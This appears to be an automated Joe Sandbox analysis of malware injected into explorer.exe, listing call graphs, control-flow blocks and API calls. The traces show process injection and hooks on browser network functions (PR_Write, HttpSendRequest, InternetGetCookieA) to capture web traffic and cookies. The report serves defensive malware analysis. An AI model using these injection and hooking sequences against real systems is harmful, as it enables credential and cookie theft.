execution_graph (node list not recoverable as a readable graph in text). Covered paths by entry point: 0x82c18 calls 0x82bf2 (11 API calls), 0x81141 (lstrlen x2) and 0x82678 (VirtualQuery, memcpy, VirtualFree); 0x83449 runs between RtlEnterCriticalSection and RtlLeaveCriticalSection and uses VirtualQuery, RtlZeroMemory, StrToIntA, lstrcat, VirtualAlloc/VirtualFree and RtlMoveMemory, with 0x82f1f starting a thread (CreateThread, CloseHandle) whose body 0x82ed2 ends in RtlExitUserThread after 0x8178c (lstrlen, CryptBinaryToStringA x2), 0x81b1b (lstrlen, lstrcat) and 0x8186c (MultiByteToWideChar, RtlZeroMemory, wsprintfW, VirtualAlloc, RtlMoveMemory); 0x82faa builds a string with wsprintfA, lstrcat, lstrlen and RtlMoveMemory; 0x8224c uses VirtualAlloc, four lstrcat calls and memcpy; shared helpers are 0x81000 (GetProcessHeap/RtlAllocateHeap), 0x81011 (VirtualQuery, GetProcessHeap/HeapFree), 0x8104c (VirtualAlloc), 0x8105d (VirtualFree) and 0x81274 (VirtualQuery).
1544 83412 1543->1544 1544->1542 1545 83416 RtlEnterCriticalSection 1544->1545 1550 83132 1545->1550 1548 82f1f 22 API calls 1549 8343a RtlLeaveCriticalSection 1548->1549 1549->1542 1551 8314d 1550->1551 1564 832e8 1550->1564 1551->1564 1571 81000 GetProcessHeap RtlAllocateHeap 1551->1571 1553 831cd 1572 81000 GetProcessHeap RtlAllocateHeap 1553->1572 1555 83212 1556 832d8 1555->1556 1557 8322c lstrlen 1555->1557 1558 81011 3 API calls 1556->1558 1557->1556 1559 8323d 1557->1559 1560 832df 1558->1560 1561 81141 2 API calls 1559->1561 1562 81011 3 API calls 1560->1562 1563 8324b 1561->1563 1562->1564 1563->1556 1573 81000 GetProcessHeap RtlAllocateHeap 1563->1573 1564->1548 1566 83260 1574 81000 GetProcessHeap RtlAllocateHeap 1566->1574 1568 8327f wsprintfA lstrcat 1569 81011 3 API calls 1568->1569 1570 832b8 lstrcat lstrlen RtlMoveMemory 1569->1570 1570->1556 1571->1553 1572->1555 1573->1566 1574->1568 1597 83371 1598 8337a 1597->1598 1599 833b2 1597->1599 1600 81274 VirtualQuery 1598->1600 1601 83382 1600->1601 1601->1599 1602 83386 RtlEnterCriticalSection 1601->1602 1603 83132 13 API calls 1602->1603 1604 833a3 1603->1604 1605 82f1f 22 API calls 1604->1605 1606 833aa RtlLeaveCriticalSection 1605->1606 1606->1599 1607 832f4 1608 83302 1607->1608 1609 8335f 1608->1609 1610 8332b RtlEnterCriticalSection 1608->1610 1611 8334e 1610->1611 1612 83342 1610->1612 1614 83357 RtlLeaveCriticalSection 1611->1614 1613 82faa 16 API calls 1612->1613 1615 83347 1613->1615 1614->1609 1616 82f1f 22 API calls 1615->1616 1616->1611

                                                      Callgraph

                                                      • Executed
                                                      • Not Executed
                                                      • Opacity -> Relevance
                                                      • Disassembly available
                                                      callgraph 0 Function_00081C08 25 Function_0008104C 0->25 58 Function_00081C82 0->58 72 Function_00081BAF 0->72 86 Function_00081BD2 0->86 1 Function_00083709 2 Function_00081000 1->2 11 Function_00081011 1->11 45 Function_00081363 1->45 78 Function_000815BE 1->78 3 Function_00083401 9 Function_00082F1F 3->9 18 Function_00083132 3->18 51 Function_00081274 3->51 4 Function_00088702 5 Function_00081305 6 Function_00082C18 30 Function_00081141 6->30 35 Function_0008105D 6->35 48 Function_00082678 6->48 99 Function_00082BF2 6->99 7 Function_00081B1B 7->2 7->11 40 Function_0008186C 7->40 8 Function_00082E1B 8->2 8->11 85 Function_00082ED2 9->85 10 Function_0008231F 10->2 11->51 12 Function_00089814 13 Function_00083829 13->1 74 Function_000836A1 13->74 87 Function_000835D4 13->87 14 Function_00081320 15 Function_00089321 16 Function_00082F3D 16->30 17 Function_0008133F 18->2 18->11 18->30 19 Function_00081235 20 Function_00085137 21 Function_00088A37 22 Function_00089337 23 Function_00083449 23->9 23->16 23->25 23->30 23->35 23->51 70 Function_00082FAA 23->70 24 Function_0008104A 26 Function_00081E4C 27 Function_0008224C 27->2 28 Function_00081F4E 29 Function_00083840 31 Function_00082643 32 Function_00089844 33 Function_00082346 33->2 33->11 66 Function_00082296 33->66 34 Function_00082659 36 Function_0008285F 36->30 37 Function_00089955 38 Function_0008966A 39 Function_0008106C 40->2 40->11 40->25 40->39 63 Function_00081090 40->63 84 Function_000817DC 40->84 41 Function_0008926D 42 Function_00082B6E 42->7 42->11 42->35 42->42 52 Function_00082974 42->52 54 Function_0008178C 42->54 96 Function_000827E7 42->96 43 Function_00081261 44 Function_00083862 44->0 44->2 44->5 44->11 44->13 44->14 44->19 44->30 44->43 44->51 56 Function_0008118D 44->56 60 Function_00082D9A 44->60 44->63 67 Function_00082EA8 44->67 69 Function_000812AA 44->69 82 Function_000816C7 44->82 94 Function_00081FE5 44->94 45->17 46 Function_00089763 
47 Function_00081765 48->2 48->51 49 Function_00083371 49->9 49->18 49->51 50 Function_00088A71 52->2 52->11 52->25 52->30 52->35 52->36 52->47 71 Function_000828AD 52->71 53 Function_00082C8A 53->35 53->48 53->99 54->2 55 Function_00083D8D 55->2 55->44 55->51 55->55 91 Function_00083BE1 55->91 57 Function_00088B81 93 Function_00081CE5 58->93 59 Function_00085198 61 Function_0008929C 62 Function_00088A9F 64 Function_00088F93 65 Function_00082295 67->8 68 Function_000815A9 70->2 70->11 70->16 70->30 71->30 73 Function_000850A0 74->2 74->11 74->45 83 Function_000814D8 74->83 75 Function_000823A2 76 Function_00081CA5 76->93 77 Function_000833B9 77->9 77->18 77->51 78->2 78->11 78->68 78->78 79 Function_00082CCE 79->48 80 Function_000887CE 81 Function_00088CC3 83->2 83->11 89 Function_000813D7 83->89 98 Function_000813FE 83->98 85->7 85->11 85->35 85->54 86->76 87->2 87->11 87->45 87->83 88 Function_000893D4 90 Function_00088EEF 91->2 91->5 91->13 91->14 91->19 91->30 91->43 91->51 91->63 91->67 91->69 91->94 92 Function_000823E3 92->10 92->11 92->25 92->33 92->75 94->26 94->28 94->51 95 Function_000895E5 96->11 96->51 97 Function_000889F9 98->2 98->11 98->83 98->89 99->27 99->92 100 Function_000832F4 100->9 100->70

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 83862-838de call 81000 GetModuleFileNameA call 81000 GetCurrentProcessId wsprintfA call 8118d CreateMutexA GetLastError 7 838e4-83940 RtlInitializeCriticalSection PathFindFileNameA lstrcat call 81000 Sleep lstrcmpi 0->7 8 83bc5-83c3a call 81011 * 2 RtlExitUserThread call 81000 * 2 wsprintfA call 81235 0->8 14 83a0a-83a14 lstrcmpi 7->14 15 83946-83961 GetCommandLineW CommandLineToArgvW 7->15 69 83c3c-83c4c call 81141 8->69 70 83c5e 8->70 17 83a1a-83a24 lstrcmpi 14->17 18 83b14-83b39 call 816c7 GetModuleHandleA GetProcAddress 14->18 19 83bc3-83bc4 15->19 20 83967-8398b call 816c7 GetModuleHandleA GetProcAddress 15->20 17->18 24 83a2a-83a40 lstrcmpi 17->24 34 83b3b-83b47 call 81c08 18->34 35 83b4c-83b59 GetModuleHandleA GetProcAddress 18->35 19->8 32 8398d-83999 call 81c08 20->32 33 8399e-839c0 GetModuleHandleA GetProcAddress 20->33 28 83a42-83a4e GetCommandLineA StrStrIA 24->28 29 83a67-83a71 lstrcmpi 24->29 28->29 37 83a50 28->37 30 83a88-83a92 lstrcmpi 29->30 31 83a73-83a7f GetCommandLineA StrStrIA 29->31 30->19 39 83a98-83aa4 GetCommandLineA StrStrIA 30->39 31->30 38 83a81-83a86 31->38 32->33 41 839c2-839d0 GetModuleHandleA GetProcAddress 33->41 42 839d6-839e8 GetModuleHandleA GetProcAddress 33->42 34->35 44 83b5b-83b67 call 81c08 35->44 45 83b6c-83b79 GetModuleHandleA GetProcAddress 35->45 47 83a55-83a65 GetModuleHandleA 37->47 38->47 39->19 48 83aaa-83ac5 GetModuleHandleA 39->48 41->42 49 83b08-83b0f call 816c7 41->49 50 839f9-83a05 42->50 51 839ea-839f3 GetModuleHandleA GetProcAddress 42->51 44->45 54 83b7b-83b87 call 81c08 45->54 55 83b8c-83bbe call 816c7 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 45->55 56 83ace-83ad2 47->56 59 83ad8-83aea call 816c7 call 82d9a 48->59 60 83ac7-83acc GetModuleHandleA 48->60 49->19 61 83b03 call 81c08 50->61 51->49 51->50 54->55 55->19 56->19 56->59 59->49 82 83aec-83af5 call 81274 59->82 60->56 61->49 
79 83c4e call 83829 69->79 80 83c53-83c59 call 81261 69->80 73 83c64-83c74 CreateToolhelp32Snapshot 70->73 76 83c7a-83c8e Process32First 73->76 77 83d7d-83d88 Sleep 73->77 81 83d6e-83d70 76->81 77->73 79->80 80->70 85 83c93-83ca5 lstrcmpi 81->85 86 83d76-83d77 CloseHandle 81->86 82->49 93 83af7-83b01 82->93 88 83cda-83ce3 call 812aa 85->88 89 83ca7-83cb5 lstrcmpi 85->89 86->77 97 83d62-83d68 Process32Next 88->97 98 83ce5-83cee call 81305 88->98 89->88 92 83cb7-83cc5 lstrcmpi 89->92 92->88 95 83cc7-83cd4 call 82ea8 92->95 93->61 95->88 95->97 97->81 98->97 102 83cf0-83cf7 call 81320 98->102 102->97 105 83cf9-83d06 call 81274 102->105 105->97 108 83d08-83d5d lstrcmpi call 81090 call 81fe5 call 81090 105->108 108->97
                                                      APIs
                                                        • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                        • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 00083886
                                                      • GetCurrentProcessId.KERNEL32(00000001), ref: 0008389B
                                                      • wsprintfA.USER32 ref: 000838B6
                                                        • Part of subcall function 0008118D: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 000811A9
                                                        • Part of subcall function 0008118D: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 000811C1
                                                        • Part of subcall function 0008118D: lstrlen.KERNEL32(?,00000000), ref: 000811C9
                                                        • Part of subcall function 0008118D: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 000811D4
                                                        • Part of subcall function 0008118D: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 000811EE
                                                        • Part of subcall function 0008118D: wsprintfA.USER32 ref: 00081205
                                                        • Part of subcall function 0008118D: CryptDestroyHash.ADVAPI32(?), ref: 0008121E
                                                        • Part of subcall function 0008118D: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00081228
                                                      • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 000838CD
                                                      • GetLastError.KERNEL32 ref: 000838D3
                                                      • RtlInitializeCriticalSection.NTDLL(00086038), ref: 000838F3
                                                      • PathFindFileNameA.SHLWAPI(?), ref: 000838FA
                                                      • lstrcat.KERNEL32(00085CDE,00000000), ref: 00083910
                                                      • Sleep.KERNEL32(000001F4), ref: 0008392A
                                                      • lstrcmpi.KERNEL32(00000000,firefox.exe), ref: 0008393C
                                                      • GetCommandLineW.KERNEL32(?), ref: 0008394F
                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,VirtualQuery), ref: 0008397E
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00083987
                                                      • GetModuleHandleA.KERNEL32(nspr4.dll,PR_GetDescType), ref: 000839AF
                                                      • GetProcAddress.KERNEL32(00000000), ref: 000839B2
                                                      • GetModuleHandleA.KERNEL32(nss3.dll,PR_GetDescType), ref: 000839C4
                                                      • GetProcAddress.KERNEL32(00000000), ref: 000839C7
                                                      • GetModuleHandleA.KERNEL32(nspr4.dll,PR_Write), ref: 000839E1
                                                      • GetProcAddress.KERNEL32(00000000), ref: 000839E4
                                                      • GetModuleHandleA.KERNEL32(nss3.dll,PR_Write), ref: 000839EC
                                                      • GetProcAddress.KERNEL32(00000000), ref: 000839EF
                                                      • lstrcmpi.KERNEL32(00000000,chrome.exe), ref: 00083A6D
                                                      • GetCommandLineA.KERNEL32(NetworkService), ref: 00083A78
                                                      • StrStrIA.SHLWAPI(00000000), ref: 00083A7B
                                                      • lstrcmpi.KERNEL32(00000000,opera.exe), ref: 00083A8E
                                                      • GetCommandLineA.KERNEL32(NetworkService), ref: 00083A9D
                                                      • StrStrIA.SHLWAPI(00000000), ref: 00083AA0
                                                      • GetModuleHandleA.KERNEL32(opera.dll), ref: 00083ABF
                                                      • GetModuleHandleA.KERNEL32(opera_browser.dll), ref: 00083ACC
                                                      • CommandLineToArgvW.SHELL32(00000000), ref: 00083956
                                                        • Part of subcall function 000816C7: GetCurrentProcessId.KERNEL32 ref: 000816D9
                                                        • Part of subcall function 000816C7: GetCurrentThreadId.KERNEL32 ref: 000816E1
                                                        • Part of subcall function 000816C7: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000816F1
                                                        • Part of subcall function 000816C7: Thread32First.KERNEL32(00000000,0000001C), ref: 000816FF
                                                        • Part of subcall function 000816C7: CloseHandle.KERNEL32(00000000), ref: 00081758
                                                      • lstrcmpi.KERNEL32(00000000,iexplore.exe), ref: 00083A10
                                                      • lstrcmpi.KERNEL32(00000000,microsoftedgecp.exe), ref: 00083A20
                                                      • lstrcmpi.KERNEL32(00000000,msedge.exe), ref: 00083A30
                                                      • GetCommandLineA.KERNEL32(NetworkService), ref: 00083A47
                                                      • StrStrIA.SHLWAPI(00000000), ref: 00083A4A
                                                      • GetModuleHandleA.KERNEL32(chrome.dll), ref: 00083A5F
                                                      • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestA), ref: 00083B2C
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00083B35
                                                      • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestW), ref: 00083B52
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00083B55
                                                      • GetModuleHandleA.KERNEL32(wininet.dll,InternetWriteFile), ref: 00083B72
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00083B75
                                                      • GetModuleHandleA.KERNEL32(wininet.dll,HttpQueryInfoA), ref: 00083B99
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00083B9C
                                                      • GetModuleHandleA.KERNEL32(wininet.dll,InternetQueryOptionA), ref: 00083BA9
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00083BAC
                                                      • GetModuleHandleA.KERNEL32(wininet.dll,InternetGetCookieA), ref: 00083BB9
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00083BBC
                                                        • Part of subcall function 00081C08: RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 00081C42
                                                      • RtlExitUserThread.NTDLL(00000000), ref: 00083BD9
                                                      • wsprintfA.USER32 ref: 00083C1F
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00083C69
                                                      • Process32First.KERNEL32(00000000,?), ref: 00083C88
                                                      • CloseHandle.KERNELBASE(00000000), ref: 00083D77
                                                      • Sleep.KERNELBASE(000003E8), ref: 00083D82
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Handle$Module$AddressProc$Cryptlstrcmpi$CommandLine$CreateHash$CurrentProcesswsprintf$CloseContextFileFirstHeapNameSleepSnapshotThreadToolhelp32$AcquireAllocateArgvCriticalDataDestroyErrorExitFindInitializeLastMemoryMoveMutexParamPathProcess32ReleaseSectionThread32Userlstrcatlstrlen
                                                      • String ID: %s%d%d%d$%s%s$HttpQueryInfoA$HttpSendRequestA$HttpSendRequestW$InternetGetCookieA$InternetQueryOptionA$InternetWriteFile$NetworkService$PR_GetDescType$PR_Write$VirtualQuery$chrome.dll$chrome.exe$fgclearcookies$firefox.exe$iexplore.exe$kernel32.dll$microsoftedgecp.exe$msedge.dll$msedge.exe$nspr4.dll$nss3.dll$opera.dll$opera.exe$opera_browser.dll$wininet.dll
                                                      • API String ID: 2480436012-2618538661
                                                      • Opcode ID: b9f6ff7a843870f369ebe3c7313e7c28a896d86895adef5c6821e2817a989fd5
                                                      • Instruction ID: 4080beb071130776e6dd09e7f3c374191be514a04634faf7e68f9b4ce61aff03
                                                      • Opcode Fuzzy Hash: b9f6ff7a843870f369ebe3c7313e7c28a896d86895adef5c6821e2817a989fd5
                                                      • Instruction Fuzzy Hash: AEA1D370A40716A7E71077719C49E6F3A9CBF91B41B120524F6C1AB292EF79C9028FA6

                                                      Control-flow Graph

                                                      control_flow_graph 159 83d8d-83d97 call 81274 162 83d99-83dc2 call 81000 RtlMoveMemory 159->162 163 83e03-83e04 159->163 166 83de8-83dfc NtUnmapViewOfSection 162->166 167 83dc4-83de2 call 81000 RtlMoveMemory 162->167 169 83e0a-83e15 call 83be1 166->169 170 83dfe-83dff 166->170 167->166 177 83e20-83e23 169->177 178 83e17-83e1b call 83d8d 169->178 170->163 172 83e01-83e05 call 83862 170->172 172->169 178->177
                                                      APIs
                                                        • Part of subcall function 00081274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00081281
                                                        • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                        • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                      • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00083DAF
                                                      • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00083DE2
                                                      • NtUnmapViewOfSection.NTDLL(000000FF), ref: 00083DEB
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: HeapMemoryMove$AllocateProcessQuerySectionUnmapViewVirtual
                                                      • String ID:
                                                      • API String ID: 4050682147-0
                                                      • Opcode ID: 0bdd0153c5d571ba371ff687eaf063fdcaa43c021457fa3483b6ad3aa1bdb115
                                                      • Instruction ID: dcd502424e309425fe8eb10f29b26712ba654105e7724c8cb1046160188aa2ce
                                                      • Opcode Fuzzy Hash: 0bdd0153c5d571ba371ff687eaf063fdcaa43c021457fa3483b6ad3aa1bdb115
                                                      • Instruction Fuzzy Hash: 4301D430400601AFDB28BB64EC58BEB3B9CFF85711F118529B5D6871E2CA7B8A41CF65

                                                      Control-flow Graph

                                                      control_flow_graph 114 83be1-83c3a call 81000 * 2 wsprintfA call 81235 121 83c3c-83c4c call 81141 114->121 122 83c5e 114->122 128 83c4e call 83829 121->128 129 83c53-83c59 call 81261 121->129 124 83c64-83c74 CreateToolhelp32Snapshot 122->124 126 83c7a-83c8e Process32First 124->126 127 83d7d-83d88 Sleep 124->127 130 83d6e-83d70 126->130 127->124 128->129 129->122 133 83c93-83ca5 lstrcmpi 130->133 134 83d76-83d77 CloseHandle 130->134 135 83cda-83ce3 call 812aa 133->135 136 83ca7-83cb5 lstrcmpi 133->136 134->127 142 83d62-83d68 Process32Next 135->142 143 83ce5-83cee call 81305 135->143 136->135 138 83cb7-83cc5 lstrcmpi 136->138 138->135 140 83cc7-83cd4 call 82ea8 138->140 140->135 140->142 142->130 143->142 147 83cf0-83cf7 call 81320 143->147 147->142 150 83cf9-83d06 call 81274 147->150 150->142 153 83d08-83d5d lstrcmpi call 81090 call 81fe5 call 81090 150->153 153->142
                                                      APIs
                                                        • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                        • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                      • wsprintfA.USER32 ref: 00083C1F
                                                        • Part of subcall function 00081235: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0008123F
                                                        • Part of subcall function 00081235: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,00083C33), ref: 00081251
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00083C69
                                                      • Process32First.KERNEL32(00000000,?), ref: 00083C88
                                                      • lstrcmpi.KERNEL32(?,firefox.exe), ref: 00083CA1
                                                      • lstrcmpi.KERNEL32(?,iexplore.exe), ref: 00083CB1
                                                      • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00083CC1
                                                      • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00083D12
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 00083D68
                                                      • CloseHandle.KERNELBASE(00000000), ref: 00083D77
                                                      • Sleep.KERNELBASE(000003E8), ref: 00083D82
                                                        • Part of subcall function 00081141: lstrlen.KERNEL32(?,?,?,00000000,?,000829DD,00000001), ref: 00081150
                                                        • Part of subcall function 00081141: lstrlen.KERNEL32(:method POST,?,00000000,?,000829DD,00000001), ref: 00081155
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: lstrcmpi$FileHeapProcess32lstrlen$AllocateCloseCreateFirstHandleMappingNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                                      • String ID: %s%s$fgclearcookies$firefox.exe$iexplore.exe$microsoftedgecp.exe
                                                      • API String ID: 2509890648-2554907557
                                                      • Opcode ID: 0d0ddd3babe7951f4962b83fe7927ab9f7e6e2b6a7115e594057a30b113bad32
                                                      • Instruction ID: b3decc60f1b6fd0102e2c0e98a0bf13bb15c07833eab530b9c5dae2245e78d24
                                                      • Opcode Fuzzy Hash: 0d0ddd3babe7951f4962b83fe7927ab9f7e6e2b6a7115e594057a30b113bad32
                                                      • Instruction Fuzzy Hash: AF41E6316047029BD614BB74EC45ABF37ADBF94B40F000518B9D297192EF39DE068BA6

                                                      Control-flow Graph

                                                      control_flow_graph 180 81235-81247 OpenFileMappingA 181 81249-81259 MapViewOfFile 180->181 182 8125c-81260 180->182 181->182
                                                      APIs
                                                      • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0008123F
                                                      • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,00083C33), ref: 00081251
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: File$MappingOpenView
                                                      • String ID:
                                                      • API String ID: 3439327939-0
                                                      • Opcode ID: 2b55954cab2d3ab23cb26bdc3426ab0b4883f1f8e4826569a64c97ab8e8399a0
                                                      • Instruction ID: 31edbaac02ff07a1b824ab005dc06848c6bb7be7fdd6de8e3064e283bb2ae97a
                                                      • Opcode Fuzzy Hash: 2b55954cab2d3ab23cb26bdc3426ab0b4883f1f8e4826569a64c97ab8e8399a0
                                                      • Instruction Fuzzy Hash: 5ED017327052327BE3706ABB6C0CF836EDDEF86AE1B014025B649D2150D6608821C7F0

                                                      Control-flow Graph (executed / not-executed block colouring not captured)
                                                      • Blocks: 183 81261-81273 UnmapViewOfFile CloseHandle
                                                      APIs
                                                      • UnmapViewOfFile.KERNEL32(00000000,00000000,00083C5E,00000001), ref: 00081265
                                                      • CloseHandle.KERNELBASE(?), ref: 0008126C
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CloseFileHandleUnmapView
                                                      • String ID:
                                                      • API String ID: 2381555830-0
                                                      • Opcode ID: f9525f4a91e8645a93b96e0a949e679c081eab0605ddecb765d952afeb12ae9a
                                                      • Instruction ID: c184eb3bb083f7b6bb603a86e3cff50339feff78dbb80b7db0fead9aac5e1450
                                                      • Opcode Fuzzy Hash: f9525f4a91e8645a93b96e0a949e679c081eab0605ddecb765d952afeb12ae9a
                                                      • Instruction Fuzzy Hash: D3B01237419031D7D31427747C0C8CB3E18FF492213028540F24E82011473C08419FF5

                                                      Control-flow Graph (executed / not-executed block colouring not captured)
                                                      • Blocks: 184 81000-81010 GetProcessHeap RtlAllocateHeap
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocateProcess
                                                      • String ID:
                                                      • API String ID: 1357844191-0
                                                      • Opcode ID: b94d352eba827c55e13339f87e9f3a43d9d04c7acd40f655af300f4012798e7b
                                                      • Instruction ID: 4deb57588eb96029a35becf2c55eca230ebc00b67c115c5e18b133d903a3b778
                                                      • Opcode Fuzzy Hash: b94d352eba827c55e13339f87e9f3a43d9d04c7acd40f655af300f4012798e7b
                                                      • Instruction Fuzzy Hash: 0EA002B59501115BFE4457E4BD0DB173518B744745F248544738685050A97854148F21

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00081274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00081281
                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000001,756F3E2E), ref: 0008201A
                                                      • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00082055
                                                      • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 000820E5
                                                      • RtlMoveMemory.NTDLL(00000000,000850A0,00000016), ref: 0008210C
                                                      • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00082134
                                                      • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00082144
                                                      • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter), ref: 0008215E
                                                      • GetLastError.KERNEL32 ref: 00082166
                                                      • CloseHandle.KERNEL32(00000000), ref: 00082174
                                                      • Sleep.KERNEL32(000003E8), ref: 0008217B
                                                      • GetModuleHandleA.KERNEL32(ntdll,atan), ref: 00082191
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00082198
                                                      • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000821AE
                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000821D8
                                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000821EB
                                                      • CloseHandle.KERNEL32(00000000), ref: 000821F2
                                                      • Sleep.KERNEL32(000001F4), ref: 000821F9
                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 0008220D
                                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00082224
                                                      • CloseHandle.KERNEL32(00000000), ref: 00082231
                                                      • CloseHandle.KERNEL32(?), ref: 00082237
                                                      • CloseHandle.KERNEL32(?), ref: 0008223D
                                                      • CloseHandle.KERNEL32(00000000), ref: 00082240
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                      • String ID: atan$ntdll$opera_shared_counter
                                                      • API String ID: 1066286714-2737717697
                                                      • Opcode ID: cb3eba5e0f163015cfdde3e865c7bed91dec7b23870b9c877b2fb9ccc63931f1
                                                      • Instruction ID: b8529cd7b6f7b3f81938f29da9ae38e819e5d60d405e704a022585a417c3316f
                                                      • Opcode Fuzzy Hash: cb3eba5e0f163015cfdde3e865c7bed91dec7b23870b9c877b2fb9ccc63931f1
                                                      • Instruction Fuzzy Hash: 56616D71508315AFE710AF658C88E6B7BECFB88754F000629BA89D3291D778DD058F66

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                                        • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                                      • PathCombineW.SHLWAPI(00000000,00000000,*.*), ref: 000815EB
                                                      • FindFirstFileW.KERNEL32(00000000,?), ref: 000815F7
                                                      • lstrcmpiW.KERNEL32(?,000841C8), ref: 00081623
                                                      • lstrcmpiW.KERNEL32(?,000841CC), ref: 00081633
                                                      • PathCombineW.SHLWAPI(00000000,?,?), ref: 0008164C
                                                      • PathMatchSpecW.SHLWAPI(?,Cookies*), ref: 00081661
                                                      • PathCombineW.SHLWAPI(00000000,?,?), ref: 0008167E
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0008169C
                                                      • FindClose.KERNEL32(00000000), ref: 000816AB
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.628343470.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
